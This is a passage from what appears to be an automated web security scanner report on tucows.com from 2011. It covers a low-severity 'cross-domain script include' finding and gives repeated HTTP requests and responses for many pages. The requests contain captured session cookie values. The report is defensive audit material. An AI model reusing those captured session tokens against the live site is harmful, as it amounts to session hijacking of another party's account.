<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><strong>
...[SNIP]...
er Electronics Show in search of robots to do our bidding...with the help of Andrew Moore-Crispin and Kate Abraham, we find more cleaning robots , robots that will make things for us, robots tha
<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><img src="http://www-s.butterscotch.com/uplassets/labrats84.png" height=84 width=84 alt="Lab Rats" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><strong>
...[SNIP]...
eyboards for Apple's iconic iPad abound. Some get it right, some get it very wrong and some fall in the middle ground. We take a look at one of the latter, the tyPad Bluetooth keyboard for iPad.
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/TheSweetStuff_AlbumArt_yellow-84.png" height=84 width=84 alt="Gadget TV" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><strong>
...[SNIP]...
<p>
In order to use Hootsuite properly you'll need to connect with your social networking accounts. We show you how to do that in this episode.
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouchebottom">
<a href="http://www.butterscotch.com/">Browse more tasty tech &gt;&gt;</a>
...[SNIP]...
</a> |
<a href="http://www.tucowsinc.com/careers/">Jobs</a> |
<a href="http://www.tucowsinc.com/">Services</a>
...[SNIP]...
</a> |
<a href="http://www.butterscotch.com/">butterscotch.com </a>
...[SNIP]...
<div class="footer_right">
<a href="http://www.flickr.com/search/?q=squishycow" target="_blank"><img style="border: none;" src="images/newassets/footer_logo.gif" height=53 width=56 alt="Cows" />
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7. Cross-domain script include
There are 31 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement that a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.


7.1. http://www.tucows.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.2. http://www.tucows.com/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.3. http://www.tucows.com/advertise.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.4. http://www.tucows.com/affiliate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.5. http://www.tucows.com/author_ratings.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.6. http://www.tucows.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.7. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.8. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.9. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.10. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.11. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.12. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

